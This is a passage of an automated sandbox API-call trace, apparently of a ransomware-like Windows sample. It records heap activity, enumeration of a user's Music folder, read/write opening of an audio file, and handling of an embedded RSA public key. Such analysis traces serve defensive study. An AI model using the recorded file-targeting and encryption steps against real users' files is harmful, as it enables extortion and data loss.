lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0201.013] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\") returned="9AsT-P\\" [0201.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0201.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0201.014] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\") returned="BJHxLX\\" [0201.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fbb8 [0201.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0201.014] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0201.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0201.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fbb8 | out: hHeap=0x620000) returned 1 [0201.014] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0201.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0201.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.015] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0201.015] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.015] PathFindFileNameW (pszPath="") returned="" [0201.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.015] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\*" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb06c760, ftCreationTime.dwHighDateTime=0x1d8a306, ftLastAccessTime.dwLowDateTime=0xf64f3330, ftLastAccessTime.dwHighDateTime=0x1d8a572, ftLastWriteTime.dwLowDateTime=0xf64f3330, ftLastWriteTime.dwHighDateTime=0x1d8a572, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0201.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb06c760, ftCreationTime.dwHighDateTime=0x1d8a306, ftLastAccessTime.dwLowDateTime=0xf64f3330, ftLastAccessTime.dwHighDateTime=0x1d8a572, ftLastWriteTime.dwLowDateTime=0xf64f3330, ftLastWriteTime.dwHighDateTime=0x1d8a572, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.016] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c3fb8c0, ftCreationTime.dwHighDateTime=0x1d89b8f, ftLastAccessTime.dwLowDateTime=0xb7bfd10, ftLastAccessTime.dwHighDateTime=0x1d89d71, ftLastWriteTime.dwLowDateTime=0xb7bfd10, ftLastWriteTime.dwHighDateTime=0x1d89d71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dKtSN5wkI", cAlternateFileName="DKTSN5~1")) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0201.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0201.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0201.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0201.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0201.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2ea3a80 [0201.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0201.018] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ea885f0, ftCreationTime.dwHighDateTime=0x1d89883, ftLastAccessTime.dwLowDateTime=0xc0a723b0, ftLastAccessTime.dwHighDateTime=0x1d8a724, ftLastWriteTime.dwLowDateTime=0xc0a723b0, ftLastWriteTime.dwHighDateTime=0x1d8a724, nFileSizeHigh=0x0, nFileSizeLow=0x12b6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FGNL6u1fSAF.m4a", cAlternateFileName="FGNL6U~1.M4A")) returned 1 [0201.019] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\FGNL6u1fSAF.m4a") returned=".m4a" [0201.019] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\FGNL6u1fSAF.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\fgnl6u1fsaf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.020] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=76655) returned 1 [0201.021] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.023] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12b49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.023] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.025] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12b6f, lpOverlapped=0x0) returned 1 [0201.026] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.027] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.028] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.028] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.028] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.028] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.028] GetLastError () returned 0x0 [0201.028] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.028] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.029] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.029] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.029] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0201.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12b70) returned 0x2ea99b0 [0201.030] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fbb8 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc00 [0201.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.031] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea33e0 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0201.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.037] GetCurrentThreadId () returned 0x66c [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8478 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.038] GetCurrentThreadId () returned 0x66c [0201.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.040] 